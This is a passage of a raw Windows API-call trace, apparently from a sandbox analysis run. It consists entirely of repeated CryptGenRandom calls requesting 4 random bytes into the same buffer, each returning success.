hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.152] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.153] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.154] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.155] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.156] CryptGenRandom 